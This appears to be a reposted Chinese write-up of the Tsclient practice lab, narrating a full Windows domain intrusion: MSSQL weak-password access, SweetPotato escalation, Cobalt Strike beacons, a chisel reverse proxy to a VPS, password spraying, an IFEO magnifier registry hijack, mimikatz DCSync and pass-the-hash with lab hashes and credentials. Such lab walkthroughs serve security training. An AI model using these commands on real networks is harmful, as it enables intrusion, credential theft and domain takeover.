[春秋云镜] Tsclient仿真场景

news2025/4/15 13:52:05

文章目录

    • 靶标介绍:
    • 外网
      • mssql弱口令
      • SweetPotato提权
      • 上线CS
      • CS注入在线用户进程上线
    • 内网
      • chisel搭建代理
      • 密码喷洒攻击
      • 映像劫持 -- 放大镜提权
      • krbrelayup提权
      • Dcsync
    • 参考文章

考点:

  • mssql弱口令
  • SweetPotato提权
  • CS注入在线用户进程上线
  • 共享文件
  • CS不出网转发上线
  • 密码喷洒攻击
  • 映像劫持提权(放大镜提权)
  • Dcsync

靶标介绍:

Tsclient是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag,分布于不同的靶机。

外网

mssql弱口令

先用dirsearch扫描一下, 基本没有扫描到什么东西

fscan扫描一下 (之前kali下载的fscan啥也没扫出来,有点奇怪,得重新下了)

可以发现一个

在这里插入图片描述

用MDUT连接一下

在这里插入图片描述

成功连接, 但是开始没法执行命令, 上传文件, 四个模式都尝试了一下, 都不行, 后面点了一下激活组件的第一个, 发现可以成功执行命令了

在这里插入图片描述

SweetPotato提权

但是权限很低, 利用SweetPotato提权一下, 上传文件 (可能需要激活一下那些组件, 我开始没法上传, 激活后才可以的)

可以发现现在有了system权限

C:/Users/Public/Sweetpotato.exe -a whoami

在这里插入图片描述

拿到第一个flag

C:/Users/Public/Sweetpotato.exe -a "type C:\Users\Administrator\flag\flag01.txt"

在这里插入图片描述

上线CS

新建一个监听, 然后以这个监听生成一个🐎

然后上传CS的🐎, 把CS给上线, 用提权的命令执行, 这样上线后的CS也是system权限了

CS的服务端要运行在公网ip上, 然后也要记得把端口打开, 我一直卡在这里卡了好久😅…

C:/Users/Public/Sweetpotato.exe -a "C:/Users/Public/6.exe"

在这里插入图片描述

可以发现成功上线CS, 而且也是system的权限

在这里插入图片描述

查看一下用户

shell net user

在这里插入图片描述

直接hashdump , 抓一下密码hash值, 毕竟现在是system的账户权限

在这里插入图片描述

CS注入在线用户进程上线

查看一下在线用户 , 可以发现有john的用户在线, 那么可以用CS直接注入进程上线

shell quser || qwinst

在这里插入图片描述

查看进程列表, 选择john用户的进程进行注入

在这里插入图片描述

在这里插入图片描述

可以看到以john的用户成功上线

在这里插入图片描述

然后再去查看用户, 可以发现存在共享文件

在这里插入图片描述

查看一下共享的文件里面的内容

shell dir \\TSCLIENT\C
shell type \\TSCLIENT\C\credential.txt

在这里插入图片描述

在这里插入图片描述

可以找到一个域用户的用户名和密码 , 并且提示了镜像劫持

xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#

内网

chisel搭建代理

现在开始来搭建一下代理, 访问它的其他内网主机

服务端(vps)

./chisel server -p 8888 --reverse

客户端

shell C:/Users/Public/chisel.exe client 175.178.215.81:8888 R:0.0.0.0:9383:socks

在这里插入图片描述

成功连上 在9383端口开放socks代理

密码喷洒攻击

用少数的用户名和密码一个一个的碰撞, 看看是否能够登录到某个主机

(就是已知某个用户名和密码(或者尝试使用弱口令), 但不知道是有哪个主机可以登录, 所以一个一个尝试)

前面已经知道了一个用户名和密码

proxychains4 -q crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#'

#1. -q  : 表示安静模式, 即减少输出信息,只显示必要的执行结果,避免冗长的日志。

在这里插入图片描述

172.22.8.18 --> 未显示认证结果
172.22.8.46 --> 认证失败, 显示密码过期
172.22.8.31 --> 认证成功, 可以登录
172.22.8.15 -->未显示认证结果

使用rdesktop 进行登录

proxychains rdesktop 172.22.8.31 -u Aldrich -d xiaorang.lab -p 'Ald@rLMWuy7Z!#'

在这里插入图片描述

提示密码过期, 必须要更改密码, 密码也不能太简单

123!@#QWE

也可以使用smbpasswd.py直接修改用户名的密码进行登录 (是工具impacket里面的脚本)

python3 smbpasswd.py xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass '123!@#QWE'

改完密码后又登录不上这台主机(172.22.8.31), 但是可以登录172.22.8.46的主机, 用改后的密码

成功登录

proxychains rdesktop 172.22.8.46 -u Aldrich -d xiaorang.lab -p '123!@#QWE'

在这里插入图片描述

映像劫持 – 放大镜提权

前面也提示了要进行镜像劫持, 所以先查看一下权限 (powershell执行)

# 查看权限
get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *

命令解释:

  1. get-aclPowerShell 中的一个 cmdlet,用于检索文件、文件夹或注册表键的访问控制列表(ACL)。

    ACL 包含权限信息,例如哪些用户或组可以访问该路径,以及他们的权限类型(读取、写入、完全控制等)。

  2. -path : 指定要检查的对象路径

  3. **fl *** : 是 Format-List 的别名,用于将对象的属性以列表形式显示, *表示通配符, 显示对象的所有属性

PS C:\Users\Aldrich> get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | f
l *


PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV
                          ersion\Image File Execution Options
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV
                          ersion
PSChildName             : Image File Execution Options
PSDrive                 : HKLM
PSProvider              : Microsoft.PowerShell.Core\Registry
CentralAccessPolicyId   :
CentralAccessPolicyName :
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV
                          ersion\Image File Execution Options
Owner                   : NT AUTHORITY\SYSTEM
Group                   : NT AUTHORITY\SYSTEM
Access                  : {System.Security.AccessControl.RegistryAccessRule, System.Security.AccessControl.RegistryAcce
                          ssRule, System.Security.AccessControl.RegistryAccessRule, System.Security.AccessControl.Regis
                          tryAccessRule...}
Sddl                    : O:SYG:SYD:PAI(A;CIIO;KA;;;CO)(A;CI;CCDCLCSWRPRC;;;AU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)(A;CI;KR;;;B
                          U)(A;CI;KR;;;AC)
AccessToString          : CREATOR OWNER Allow  FullControl
                          NT AUTHORITY\Authenticated Users Allow  SetValue, CreateSubKey, ReadKey
                          NT AUTHORITY\SYSTEM Allow  FullControl
                          BUILTIN\Administrators Allow  FullControl
                          BUILTIN\Users Allow  ReadKey
                          APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadKey
AuditToString           :
AccessRightType         : System.Security.AccessControl.RegistryRights
AccessRuleType          : System.Security.AccessControl.RegistryAccessRule
AuditRuleType           : System.Security.AccessControl.RegistryAuditRule
AreAccessRulesProtected : True
AreAuditRulesProtected  : False
AreAccessRulesCanonical : True
AreAuditRulesCanonical  : True

看到它的访问权限(Access) , 可以发现经过身份验证的用户(Authenticated Users)可以设置值(SetValue)、创建子键(CreateSubKey)和读取键(ReadKey

那么我们通过用户名和密码登录的用户应该是经过身份验证的用户, 可以拥有这个权限,可以修改注册表

在这里插入图片描述

修改注册表映像劫持,使用放大镜进行提权

修改放大镜启动的 magnify.exe 替换成 C:\windows\system32\cmd.exe
这样在打开放大镜的时候就变成了打开cmd, 从而提升了cmd的权限

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

命令解释:

  1. REG ADD: 这是一个 Windows 命令行工具,用于向注册表添加新的键或值

  2. “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe”:

    • 指定注册表路径:

      • HKLM 是 HKEY_LOCAL_MACHINE 的缩写,表示本地计算机的注册表根键的驱动器形式。
      • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options 是一个特殊的注册表位置,用于配置可执行文件的执行选项。
      • magnify.exe 是 Windows 自带的“放大镜”工具(Magnifier),位于 C:\Windows\System32 目录下。

      这个注册表路径是 Windows 用于调试或拦截程序执行的机制。通过设置 Debugger 值,可以让指定的程序在启动时被替换为另一个程序。

      在这里,magnify.exe 被“劫持”,启动时会被替换为 cmd.exe

  3. /v Debugger:

    • /v 表示要添加或修改的注册表值的名称。
    • Debugger 是一个特定的值名,在 Image File Execution Options 下,用于指定当目标程序(这里是 magnify.exe)启动时,代替它运行的调试器程序。
  4. /t REG_SZ:

    • /t 指定值的类型。
    • REG_SZ 表示这是一个字符串类型的值(即文本数据)。
  5. /d “C:\windows\system32\cmd.exe”:

    • /d 指定要写入的具体数据。
    • “C:\windows\system32\cmd.exe” 是 Windows 的命令提示符程序路径。

在这里插入图片描述

点左下角的头像, 再点击锁定

在这里插入图片描述

右下角点击放大镜, 就会直接弹出一个cmd的窗口, 并且权限是system

在这里插入图片描述

在这里插入图片描述

拿到第二个flag

type C:\Users\Administrator\flag\flag02.txt

在这里插入图片描述

flag{0c3db229-2601-46d9-943b-4afb57b71ffc}

内网主机172.22.8.46肯定是不出网的, 所以还需要做一个代理转发, 让我们的主机能够直接访问到 .46主机, 方便使用一些工具对这个主机进行一些操作

172.22.8.18进行转发上线CS

利用这个内网主机创建监听

在这里插入图片描述

在这里插入图片描述

再通过这个监听生成一个🐎

在这里插入图片描述

生成的🐎要传到主机172.22.8.46 ,看wp的时候是说 远程桌面可以直接本机的文件复制粘贴过去, 但是我一直不行, 卡了很久

需要在连接的时候挂载本地文件

proxychains rdesktop 172.22.8.46 -u Aldrich -d xiaorang.lab -p '123!@#QWE'
proxychains4 rdesktop 172.22.8.46 -u Aldrich -d xiaorang.lab -p '123!@#QWE' -r disk:share=/mnt/xpw/kali_shard

# -r:rdesktop 的选项,用于启用资源重定向(resource redirection)
# disk:share=/mnt/xpw/kali_shard
#  表示将本地目录 /mnt/xpw/kali_shard 映射到远程桌面会话中,作为一个共享磁盘,名称为 share

再登录的时候就可以看到kali的共享文件了

在这里插入图片描述

运行这个7.exe, 就可以发现CS也已经成功上线了

在这里插入图片描述

然后就可以进行信息搜集一波了

shell net user /domain

在这里插入图片描述

shell net group "domain admins" /domain

在这里插入图片描述

krbrelayup提权

https://wwwgeneral.github.io/posts/from-unprivileged-user-to-system-krbrelayup/
\\tsclient\share\KrbRelayUp.exe relay --domain xiaorang.lab --CreateNewComputerAccount --ComputerName xpw$  --ComputerPassword pass@123
\\tsclient\share\KrbRelayUp.exe spawn -m rbcd -d xiaorang.lab -dc DC01.xiaorang.lab -cn xpw$ -cp pass@123

一直没成功, 不知道为什么, 一运行就会把我的共享文件给断开, 然后想复制放到其他目录去, 也不行, 复制不了, 有点奇怪…(在这里又浪费了很多时间)

Dcsync

后面还是用的镜像劫持的方法在system权限的cmd窗口上线CS, 这样上线的CS也是system权限

\\tsclient\share\7.exe

在这里插入图片描述

有了system的权限就可以抓取hash, 然后打hash传递拿域控主机的权限了

在这里插入图片描述

proxychains4 crackmapexec smb 172.22.8.15 -u WIN2016$ -H 4ba974f170ab0fe1a8a1eb0ed8f6fe1a -d xiaorang -x "type C:\Users\Administrator\flag\flag03.txt"

又是一直没成功, 一直显示认证失败, 说明抓取的hash是错误的 (有点奇怪 , 不知道为什么, 我看其他人是这样可以成功来着的啊😵‍💫, 可能哪里其他地方做错了)

在这里插入图片描述

不过前面搜集的信息可以看到, 域管理员的账户有两个WIN2016$ Administrator

WIN2016$这个行不通就看看另外一个

hashdump 可以抓到 Administrator 的hash

在这里插入图片描述

proxychains4 crackmapexec smb 172.22.8.15 -u Administrator -H 8e2eec0e9e0d89e1b046b696e0c2aef7 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

依旧没有认证成功

在这里插入图片描述

甚至认证本地172.22.8.46主机, 而不是域控主机, 都没有成功, 不理解, 有点崩了 … (还是太菜了,照着wp写都不能成功, 唉!!!)

在这里插入图片描述

然后就上传了一个mimikatz.exe到.46主机上

从域控制器中 dump 出所有账户的凭据信息

shell \\tsclient\share\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"

在这里插入图片描述

proxychains4 crackmapexec smb 172.22.8.15 -u administrator -H 2c9d81bdcf3ec8b1def10328a7cc2f08 -d xiaorang.lab -x "type C:\Users\Administrator\flag\flag03.txt"

在这里插入图片描述

关掉靶机之后, 才反应过来, 这里也抓到了WIN2016$的hash, 前面一直没成功应该就是用错了hash值导致的

不过看了看前面的前面的记录, 发现在使用logonpasswords的时候, 是有好几个WIN2016$这个用户的hash, 其中里面也有这个, 但是我偏偏试了其他的几个, 好像就没试过这个, 有点蠢了 …

在这里插入图片描述

看别人的wp的时候感觉没这么难, 但是晚上打的时候卡了好多的点, 花了好多时间, 结果还没打完, 卡到了无法传文件上去, 留到了第二天
第二天本来想试试krbrelayup提权, 结果又卡到了, 也没解决, 还是用的映像劫持, 然后就是hash传递又卡到了

参考文章

https://fushuling.com/index.php/2023/08/29/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7tsclient/
https://www.cnblogs.com/kingbridge/articles/17645128.html
https://www.kinsomnia.cn/index.php/2024/03/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83-tsclient/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2334510.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

数据集 handpose_x_plus 3D RGB 三维手势 - 手工绘画 场景 draw picture

数据集 handpose 相关项目地址:https://github.com/XIAN-HHappy/handpose_x_plus 样例数据下载地址:数据集handpose-x-plus3DRGB三维手势-手工绘画场景drawpicture资源-CSDN文库

deskflow使用教程:一个可以让两台电脑鼠标键盘截图剪贴板共同使用的开源项目

首先去开源网站下载:Release v1.21.2 deskflow/deskflow 两台电脑都要下载这个文件 下载好后直接打开找到你想要的exe desflow.exe 然后你打开他,将两台电脑的TLS都关掉 下面步骤两台电脑都要完成: 电脑点开edit-》preferences 把这个取…

详解MYSQL表空间

目录 表空间文件 表空间文件结构 行格式 Compact 行格式 变长字段列表 NULL值列表 记录头信息 列数据 溢出页 数据页 当我们使用MYSQL存储数据时,数据是如何被组织起来的?索引又是如何组织的?在本文我们将会解答这些问题。 表空间文…

[Windows] 音速启动 1.0.0.0

[Windows] 音速启动 链接:https://pan.xunlei.com/s/VONiGZhtsxpPzze0lDIH-mR9A1?pwdxu7f# [Windows] 音速启动 1.0.0.0 音速启动是一款桌面管理软件,以仿真QQ界面的形式结合桌面工具的特点,应用于软件文件夹网址的快捷操作。

Hyper-V 虚拟机配置静态IP并且映射到局域网使用

环境 win11hyper-v麒麟v10 配置 编辑文件 vi /etc/sysconfig/network-scripts/ifcfg-eth0文件内容 GATEWAY 需要参考网络中配置的网关地址 TYPEEthernet PROXY_METHODnone BROWSER_ONLYno BOOTPROTOstatic DEFROUTEyes IPV4_FAILURE_FATALno IPV6INITyes IPV6_AUTOCONFyes …

操作系统基础:06 操作系统历史

我们前面已经讲过了操作系统的基本轮廓、启动过程以及系统调用等相关内容,就如同揭开了钢琴的盖子,对操作系统有了初步的表面认识。从现在起,我们要更深入地剖析操作系统,就像分解钢琴一样,探究其各个部分的构成、原理…

【大模型微调】如何解决llamaFactory微调效果与vllm部署效果不一致如何解决

以下个人没整理太全 一、生成式语言模型的对话模板介绍 使用Qwen/Qwen1.5-0.5B-Chat训练 对话模板不一样。回答的内容就会不一样。 我们可以看到例如qwen模型的tokenizer_config.json文件,就可以看到对话模板,一般同系列的模型,模板基本都…

【2025最新】windows本地部署LightRAG,完成neo4j知识图谱保存

之前在服务器部署neo4j失败,无奈只能在本地部署,导致后期所有使用的知识图谱数据都存在本地,这里为了节省时间,先在本地安装LigthRAG完成整个实验流程,后续在学习各种服务器部署和端口调用。从基础和简单的部分先做起来…

14、nRF52xx蓝牙学习(串口 UART 和 UARTE 外设应用)

一、UART 功能描述 串口 UART 也称为通用异步收发器。是各种处理器中常用了通信接口,在 nRF52 芯片中, UART 具有以下特点: ● 全双工操作 ● 自动流控 ● 奇偶校验产生第 9 位数据 串口 UART 的数据发送与接收流程 : ◆硬件配置…

DeepSeek轻松入门教程——从入门到精通

大家好,我是吾鳴。 今天吾鳴要给大家分享一份DeepSeek小白轻松入门指导手册——《DeepSeek 15天指导手册,从入门到精通》。指导手册分为基础入门对话篇、效率飞跃篇、场景实战篇、高手进化篇等,按照指导手册操作,DeepSeek从入门到…

Vue2 老项目升级 Vue3 深度解析教程

Vue2 老项目升级 Vue3 深度解析教程 摘要 Vue3 带来了诸多改进和新特性,如性能提升、组合式 API、更好的 TypeScript 支持等,将 Vue2 老项目升级到 Vue3 可以让项目获得这些优势。本文将深入解析升级过程,涵盖升级前的准备工作、具体升级步骤…

WXJ196微机小电流接地选线装置使用简单方便无需维护

WXJ196微机小电流接地选线装置,能在系统发生单相接地时,准确、迅速地选出接地线路母 线。使用简单方便,无需维护,可根据用户需要将相关信息通过通信接口传给上级监控系统, 适用于无人值守变电站。 2 功能及特点 全新的…

Java第四节:idea在debug模式夏改变变量的值

作者往期文章 Java第一节:debug如何调试程序(附带源代码)-CSDN博客 Java第二节:debug如何调试栈帧链(附带源代码)-CSDN博客 Java第三节:新手如何用idea创建java项目-CSDN博客 步骤一 在需要修改…

门极驱动器DRV8353M设计(二)

目录 13.3.4.4 MOSFET VDS 感测 (SPI Only) 13.3.5 Gate Driver保护回路 13.3.5.1 VM 电源和 VDRAIN 欠压锁定 (UVLO) 13.3.5.2 VCP 电荷泵和 VGLS 稳压器欠压锁定 (GDUV) 13.3.5.3 MOSFET VDS过流保护 (VDS_OCP) 13.3.5.3.1 VDS Latched Shutdown (OCP_MODE 00b) 13.…

学点概率论,打破认识误区

概率论是统计分析和机器学习的核心。掌握概率论对于理解和开发稳健的模型至关重要,因为数据科学家需要掌握概率论。本博客将带您了解概率论中的关键概念,从集合论的基础知识到高级贝叶斯推理,并提供详细的解释和实际示例。 目录 简介 基本集合…

NVIDIA AI Aerial

NVIDIA AI Aerial 适用于无线研发的 NVIDIA AI Aerial 基础模组Aerial CUDA 加速 RANAerial Omniverse 数字孪生Aerial AI 无线电框架 用例构建商业 5G 网络加速 5G生成式 AI 和 5G 数据中心 加速 6G 研究基于云的工具 优势100% 软件定义通过部署在数字孪生中进行测试6G 标准化…

OpenCV 关键点定位

一、Opencv关键点定位介绍 关键点定位在计算机视觉领域占据着核心地位,它能够精准识别图像里物体的关键特征点。OpenCV 作为功能强大的计算机视觉库,提供了多种实用的关键点定位方法。本文将详细阐述关键点定位的基本原理,深入探讨 OpenCV 中…

arm_math.h、arm_const_structs.h 和 arm_common_tables.h

在 ​​FOC(Field-Oriented Control,磁场定向控制)​​ 中,arm_math.h、arm_const_structs.h 和 arm_common_tables.h 是 CMSIS-DSP 库的核心组件,用于实现高效的数学运算、预定义结构和查表操作。以下是它们在 FOC 控…

buuctf sql注入类练习

BUU SQL COURSE 1 1 实例无法访问 / Instance cant be reached at that time | BUUCTF但是这个地方很迷惑就是这个 一个 # 我们不抓包就不知道这个是sql注入类的判断是 get 类型的sql注入直接使用sqlmap我们放入到1.txt中 目的是 优先检测 ?id1>python3 sqlmap.py -r 1.t…

具身导航中的视觉语言注意力蒸馏!Vi-LAD:实现动态环境中的社会意识机器人导航

作者:Mohamed Elnoor 1 ^{1} 1, Kasun Weerakoon 1 ^{1} 1, Gershom Seneviratne 1 ^{1} 1, Jing Liang 2 ^{2} 2, Vignesh Rajagopal 3 ^{3} 3, and Dinesh Manocha 1 , 2 ^{1,2} 1,2单位: 1 ^{1} 1马里兰大学帕克分校电气与计算机工程系, 2…